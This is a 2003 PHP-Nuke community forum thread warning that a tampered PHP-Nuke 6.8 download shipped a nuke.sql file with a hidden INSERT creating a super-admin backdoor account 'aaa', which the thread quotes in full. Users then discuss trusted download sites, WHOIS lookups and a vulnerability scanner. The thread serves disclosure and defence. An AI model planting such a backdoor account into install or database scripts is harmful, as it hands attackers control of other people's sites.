Author |
Message |
SpankedMonkey
Nuke Soldier


Joined: Jul 17, 2003
Posts: 19
|
Posted:
Sun Jul 20, 2003 3:34 pm |
  |
I downloaded a copy of nuke 6.8 on monday, after installing it on my site and loading the database I was unable to create an admin account. A very nice nukecop staff member offered to debug it and found that I had already created an account name aaa. Now this happened on 2 other databases that I loaded and I know I didn't create an account by accident 3 times, so I checked the other DB's and found they too had a GOD account created as aaa. Now, I decided to act on a hunch and search the nuke.sql for aaa.
I found this:
Code: |
INSERT INTO nuke_authors VALUES ( 'aaa', 'God', 'http://a', 'a', '0cc175b9c0f1b6a831c399e269772661', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', ''); |
I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track.
So all I can say is be very careful where you get your downloads and be aware that this is in circulation. |
|
|
   |
 |
chatserv
General


Joined: Jan 12, 2003
Posts: 3128
Location: Puerto Rico
|
Posted:
Sun Jul 20, 2003 5:53 pm |
  |
Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors. |
_________________ Feed a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime.
ScriptHeaven | NukeResources |
|
    |
 |
Raven
General


Joined: Mar 22, 2003
Posts: 5233
Location: USA
|
Posted:
Sun Jul 20, 2003 6:03 pm |
  |
Interesting turn of events, isn't it. The question is hotly debated as to what $10 will buy you. Hmmm. |
_________________ Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff |
|
    |
 |
MikeMiles
Lieutenant


Joined: May 29, 2003
Posts: 231
|
Posted:
Mon Jul 21, 2003 1:02 am |
  |
chatserv wrote: |
Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors. |
Even then you have to be on your guard. I came across one of the established Nuke sites advertising a hacker's security fix on their front page which you all caught as bogus. I had to tell them to remove it. I won't post which one it was, but I'll say many sites just don't check things out. |
|
|
   |
 |
ulissesnelson
Lieutenant


Joined: Apr 09, 2003
Posts: 188
|
Posted:
Mon Jul 21, 2003 2:50 am |
  |
iD LIKE by first Job..(site almost ready,waiting mikem answer ) Get NUKE REPORT into the patrol of (unficial) Nuke Sites.
and my sugestion its,why the nuke files can be only autorized to be downloaded from official nuke sites
like nuke cops,phpnuke ,we can created a standart image,sayng that its a secure web site...
what u think? |
_________________ Were You Go Today? <b>NuKe Report </b> ill Help you |
|
   |
 |
luchtzak
Support Mod


Joined: Mar 19, 2003
Posts: 308
|
Posted:
Mon Jul 21, 2003 2:52 am |
  |
I allready had a phpnuke 6.7 version and in the sql-file they had added a link to their website so you would get:
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license
URL of that website
Be carefull what you download! I think it can be easy to install something on it to track your website etc... |
_________________ Luchtzak Aviation - Snookerforum Belgium |
|
    |
 |
foxyfemfem
Support Staff


Joined: Jan 23, 2003
Posts: 668
Location: USA
|
Posted:
Mon Jul 21, 2003 3:09 am |
  |
Hello,
Quoting the Security Alert Message on the mainpage
Quote: |
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org. |
Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.
Did I miss something here? |
|
|
   |
 |
MikeMiles
Lieutenant


Joined: May 29, 2003
Posts: 231
|
Posted:
Mon Jul 21, 2003 3:51 am |
  |
Quote: |
Did I miss something here? |
Apparently so. The FAQ is a word-for-word rip off from the main site. Like you I don't see any link for downloading, but it could have been changed or maybe the wrong URL was posted.
Anyway, this is the registration of the site you think is legit looking. Missing a few details wouldn't you say?
WhoIs Results for nukephp.org
Contact Type Registrant
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Contact Type Administrative
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Contact Type Billing
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Contact Type Technical
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:
Other Information
created-by: 5065-EN
created-date:
nameserver: dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com
registrar: 5065-EN
registration-expiration-date:
status:
updated-by: 5065-EN
updated-date: |
|
|
   |
 |
Raven
General


Joined: Mar 22, 2003
Posts: 5233
Location: USA
|
Posted:
Mon Jul 21, 2003 3:59 am |
  |
foxyfemfem wrote: |
Hello,
Quoting the Security Alert Message on the mainpage
Quote: |
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org. |
Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.
Did I miss something here? |
You cannot download v6.8 from phpnuke.org without being a member of the Club, so he did not d/l it from there. |
_________________ Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff |
|
    |
 |
SpankedMonkey
Nuke Soldier


Joined: Jul 17, 2003
Posts: 19
|
Posted:
Mon Jul 21, 2003 6:46 am |
  |
As I said above:
Quote: |
I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track. |
I want to say that I did get it from a link off of nukephp.org but I can not be sure, I thought I did. The link said that it required no registration also.
When I get home from work, I will see if there is anything else I can do to see where I got the download. |
|
|
   |
 |
Zhen-Xjell
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939
|
Posted:
Mon Jul 21, 2003 6:50 am |
  |
Running analzyer will show you who the admins are of php-nuke and the phpbb2 forums. You can, as I often do, run it for a quick visual check of any changes. |
_________________ Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki] |
|
     |
 |
Stylee
Sergeant


Joined: Jun 22, 2003
Posts: 140
Location: USA
|
Posted:
Tue Jul 22, 2003 4:56 pm |
  |
Where do you get the analyzer from? |
|
|
     |
 |
Zhen-Xjell
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939
|
Posted:
Tue Jul 22, 2003 5:33 pm |
  |
Hi, right on our front page. |
_________________ Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki] |
|
     |
 |
Stylee
Sergeant


Joined: Jun 22, 2003
Posts: 140
Location: USA
|
Posted:
Tue Jul 22, 2003 6:46 pm |
  |
|
     |
 |
Stylee
Sergeant


Joined: Jun 22, 2003
Posts: 140
Location: USA
|
Posted:
Tue Jul 22, 2003 7:46 pm |
  |
Ok, I got warnings big time, I was able to fix alot of them simply. but this is the part that I am not sure about.
I got this
-------
WARNING! WARNING! WARNING! Vulnerable PHP On Your Server!
PHP Version Reason For Vulnerability
4.3.1 Your Server may be vulnerable to Cross-site Scripting in PHP's Transparent Session ID Support. Versions prior to 4.3.2 are affected. Tell your host to read the SecurityFocus report by clicking --> here. Until that is resolved, PHP-Nuke should be the least of your worries.
AFFECTED VERSIONS: Constraints
4.3.0 and 4.3.1 with php.ini containing session.use_trans_sid=1
4.2.0 to 4.2.3 without php.ini, or with php.ini containing session.use_trans_sid=1(php.ini-dist and php.ini-recommended from the PHP source distribution had use_trans_sid=1 from 4.2.0 to 4.2.2, and use_trans_sid=0 for 4.2.3 and later versions.)
prior to 4.2.0 compiled with --enable-trans-sid and with session.use_trans_sid=1
FIXED VERSIONS: Suggestion
4.3.2 or later Backup your system and upgrade PHP, also read the article at SecurityFocus. Solution 1 from Security Focus: Click, Solution 2 from thathost: Click. Solution 1 suggests the use of mod_security, which is an Apache module discussed at Nuke Cops: Here
Does this meant that this will be resolved if I update to nule 4.3.2?
How do I tell what version that I am on. I am using PHPNuke 6.7 |
|
|
     |
 |
|